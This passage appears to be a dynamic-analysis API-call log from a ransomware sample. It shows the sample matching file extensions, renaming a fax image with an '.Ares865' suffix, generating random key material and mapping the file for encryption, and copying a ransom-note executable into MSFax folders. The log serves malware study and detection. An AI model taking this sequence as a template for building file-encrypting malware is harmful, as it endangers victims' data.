returned 1 [0083.709] lstrlenW (lpString="p96") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="p96") returned 1 [0083.709] lstrlenW (lpString="p97") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="p97") returned 1 [0083.709] lstrlenW (lpString="pan") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="pan") returned 1 [0083.710] lstrlenW (lpString="pdb") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="pdb") returned 1 [0083.710] lstrlenW (lpString="pdm") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="pdm") returned 1 [0083.710] lstrlenW (lpString="pnz") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="pnz") returned 1 [0083.710] lstrlenW (lpString="qry") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="qry") returned 1 [0083.710] lstrlenW (lpString="qvd") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="qvd") returned 1 [0083.710] lstrlenW (lpString="rbf") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="rbf") returned 1 [0083.710] lstrlenW (lpString="rctd") returned 4 [0083.710] lstrcmpiW (lpString1=".tif", lpString2="rctd") returned -1 [0083.710] lstrlenW (lpString="rod") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="rod") returned 1 [0083.710] lstrlenW (lpString="rodx") returned 4 [0083.710] lstrcmpiW (lpString1=".tif", lpString2="rodx") returned -1 [0083.710] lstrlenW (lpString="rpd") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="rpd") returned 1 [0083.710] lstrlenW (lpString="rsd") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="rsd") returned 1 [0083.710] lstrlenW (lpString="sas7bdat") returned 8 [0083.710] lstrcmpiW (lpString1="eFax.tif", lpString2="sas7bdat") returned -1 [0083.710] lstrlenW (lpString="sbf") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="sbf") returned 1 [0083.710] lstrlenW (lpString="scx") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="scx") returned 1 [0083.710] lstrlenW (lpString="sdb") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="sdb") returned 1 [0083.710] lstrlenW (lpString="sdc") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="sdc") returned 1 [0083.710] lstrlenW (lpString="sdf") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="sdf") returned 1 [0083.710] lstrlenW (lpString="sis") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="sis") returned 1 [0083.710] lstrlenW (lpString="spq") returned 3 [0083.710] lstrcmpiW (lpString1="tif", lpString2="spq") returned 1 [0083.711] lstrlenW (lpString="te") returned 2 [0083.711] lstrcmpiW (lpString1="if", lpString2="te") returned -1 [0083.711] lstrlenW (lpString="teacher") returned 7 [0083.711] lstrcmpiW (lpString1="Fax.tif", lpString2="teacher") returned -1 [0083.711] lstrlenW (lpString="tmd") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="tmd") returned -1 [0083.711] lstrlenW (lpString="tps") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="tps") returned -1 [0083.711] lstrlenW (lpString="trc") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="trc") returned -1 [0083.711] lstrlenW (lpString="trc") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="trc") returned -1 [0083.711] lstrlenW (lpString="trm") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="trm") returned -1 [0083.711] lstrlenW (lpString="udb") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="udb") returned -1 [0083.711] lstrlenW (lpString="udl") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="udl") returned -1 [0083.711] lstrlenW (lpString="usr") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="usr") returned -1 [0083.711] lstrlenW (lpString="v12") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="v12") returned -1 [0083.711] lstrlenW (lpString="vis") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="vis") returned -1 [0083.711] lstrlenW (lpString="vpd") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="vpd") returned -1 [0083.711] lstrlenW (lpString="vvv") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="vvv") returned -1 [0083.711] lstrlenW (lpString="wdb") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="wdb") returned -1 [0083.711] lstrlenW (lpString="wmdb") returned 4 [0083.711] lstrcmpiW (lpString1=".tif", lpString2="wmdb") returned -1 [0083.711] lstrlenW (lpString="wrk") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="wrk") returned -1 [0083.711] lstrlenW (lpString="xdb") returned 3 [0083.711] lstrcmpiW (lpString1="tif", lpString2="xdb") returned -1 [0083.711] lstrlenW (lpString="xld") returned 3 [0083.712] lstrcmpiW (lpString1="tif", lpString2="xld") returned -1 [0083.712] lstrlenW (lpString="xmlff") returned 5 [0083.712] lstrcmpiW (lpString1="x.tif", lpString2="xmlff") returned -1 [0083.712] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif.Ares865") returned 87 [0083.712] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif.ares865"), dwFlags=0x1) returned 1 [0083.713] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.713] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89534) returned 1 [0083.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0083.713] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0083.714] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.714] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0083.714] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x160c0, lpName=0x0) returned 0x15c [0083.718] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160c0) returned 0x190000 [0083.723] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0083.724] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.724] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0083.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0083.724] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0083.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.724] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.724] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.724] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.724] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.724] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.725] CloseHandle (hObject=0x15c) returned 1 [0083.725] CloseHandle (hObject=0x118) returned 1 [0083.725] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0083.725] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.726] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 0 [0083.726] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.726] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0083.726] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" [0083.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0083.726] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 55 [0083.726] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" [0083.726] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.726] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\sentitems\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.727] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.727] GetLastError () returned 0x0 [0083.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.727] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.727] CloseHandle (hObject=0x120) returned 1 [0083.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.727] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.727] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.727] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.727] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.727] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.727] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.727] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.727] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.727] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.727] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.727] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3881a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.728] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.728] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3881a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0083.728] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.728] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0083.728] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" [0083.728] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e47f0 | out: hHeap=0x2b0000) returned 1 [0083.728] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0083.728] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned 51 [0083.728] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" [0083.728] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.728] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\queue\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.728] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.729] GetLastError () returned 0x0 [0083.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.729] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.729] CloseHandle (hObject=0x120) returned 1 [0083.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.729] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.729] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.729] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.729] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.729] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.729] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.729] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.729] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.729] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.729] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.729] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3881a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.729] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.729] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3881a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0083.729] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.729] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0083.729] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" [0083.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0083.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0083.729] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 51 [0083.729] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" [0083.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.730] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\inbox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.730] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.730] GetLastError () returned 0x0 [0083.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.730] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.730] CloseHandle (hObject=0x120) returned 1 [0083.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.730] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.731] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.731] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.731] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.731] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.731] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.731] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.731] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.731] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.731] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3881a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.731] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.731] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3881a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", 